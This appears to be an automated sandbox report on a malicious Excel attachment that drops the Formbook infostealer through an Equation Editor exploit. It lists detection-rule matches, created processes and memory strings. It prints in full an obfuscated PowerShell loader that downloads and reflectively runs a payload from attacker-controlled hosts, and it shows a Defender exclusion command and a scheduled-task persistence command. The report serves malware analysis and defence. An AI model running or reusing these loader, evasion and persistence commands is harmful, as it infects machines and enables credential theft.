Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.511155982.0000000000330000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.637518852.00000000002E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.638758536.0000000006123000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.487856362.0000000003289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 2660, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1368, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: aspnet_regbrowsers.exe PID: 2452, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_regbrowsers.exe PID: 3760, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: mstsc.exe PID: 4060, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6035E009.doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords[1].doc, type: DROPPED Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, DyZNpLnfd9hpvhcF8H.cs Security API names: _0020.SetAccessControl
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, DyZNpLnfd9hpvhcF8H.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, DyZNpLnfd9hpvhcF8H.cs Security API names: _0020.AddAccessRule
Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, ImBC8bCfH7H4rWrIxE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@536/37@18/3
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0092BC3B memset,memset,??2@YAPAXI@Z,CreateThread,GetLastError,CloseHandle,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,MessageBoxW,LocalFree, 27_2_0092BC3B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_0091B92E CoCreateInstance, 27_2_0091B92E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 27_2_008E2890 LoadLibraryExW,FindResourceExW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary, 27_2_008E2890
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\FC830000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\niLILOT.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR9A5B.tmp Jump to behavior
Source: PO.78NO9.xls OLE indicator, Workbook stream: true
Source: FC830000.0.dr OLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X..........................................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X..........................................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X..........................................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X............... ..........................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X...............3..........................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X...............@..........................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................a.g.a.i.n...............X...............R..........................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X..............._..........................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........r..........................s............X....... ....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X...............~..........................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X..........................................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X..........................................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............X.......$....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X..........................................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X..........................................s............................................ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X..........................................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............X.......2....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X..........................................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X..........................................s....................l....................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X..........................................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.............X...............+..........................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.............X...............7..........................s............X............................... Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................................8.......(.P.....................<...............................................................................
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ........................................(.P.............................d.........................................................0.......0.....
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ......................0.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$.s..............0.....................x.......&.................0.....
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: UPDATE [dbo].[Customers] SET [C_Fname] = @C_Fname, [C_Lname] = @C_Lname, [C_address] = @C_address, [C_City] = @C_City, [C_Country] = @C_Country, [C_datemodifay] = @C_datemodifay WHERE (([C_id] = @Original_C_id) AND ([C_Fname] = @Original_C_Fname) AND ([C_Lname] = @Original_C_Lname) AND ([C_City] = @Original_C_City) AND ([C_Country] = @Original_C_Country) AND ((@IsNull_C_datemodifay = 1 AND [C_datemodifay] IS NULL) OR ([C_datemodifay] = @Original_C_datemodifay)));
Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INSERT INTO [dbo].[Product] ([Product_name], [p_modifaydate]) VALUES (@Product_name, @p_modifaydate);
Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INSERT INTO [dbo].[Orders] ([C_id], [order_date], [sheeped_date], [O_maodifaydate]) VALUES (@C_id, @order_date, @sheeped_date, @O_maodifaydate);
Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: UPDATE [dbo].[Users] SET [UserName] = @UserName, [Password] = @Password WHERE (([UserName] = @Original_UserName) AND ([Password] = @Original_Password));
Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INSERT INTO [dbo].[Jurnal] ([Date], [Operation], [Table_name], [Old_values], [New_values]) VALUES (@Date, @Operation, @Table_name, @Old_values, @New_values);
Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: UPDATE [dbo].[Orders] SET [C_id] = @C_id, [order_date] = @order_date, [sheeped_date] = @sheeped_date, [O_maodifaydate] = @O_maodifaydate WHERE (([Order_id] = @Original_Order_id) AND ([C_id] = @Original_C_id) AND ([order_date] = @Original_order_date) AND ([sheeped_date] = @Original_sheeped_date) AND ((@IsNull_O_maodifaydate = 1 AND [O_maodifaydate] IS NULL) OR ([O_maodifaydate] = @Original_O_maodifaydate)));
Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: UPDATE [dbo].[Jurnal] SET [Date] = @Date, [Operation] = @Operation, [Table_name] = @Table_name, [Old_values] = @Old_values, [New_values] = @New_values WHERE (([Date] = @Original_Date) AND ([Operation] = @Original_Operation) AND ([Table_name] = @Original_Table_name));
Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: UPDATE [dbo].[Product] SET [Product_name] = @Product_name, [p_modifaydate] = @p_modifaydate WHERE (([Product_id] = @Original_Product_id) AND ([Product_name] = @Original_Product_name) AND ((@IsNull_p_modifaydate = 1 AND [p_modifaydate] IS NULL) OR ([p_modifaydate] = @Original_p_modifaydate)));
Source: PO.78NO9.xls Virustotal: Detection: 16%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {6F06CFDC-8B46-4289-9A59-403AE8C9352A} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\niLILOT.exe C:\Users\user\AppData\Roaming\niLILOT.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\niLILOT.exe C:\Users\user\AppData\Roaming\niLILOT.exe
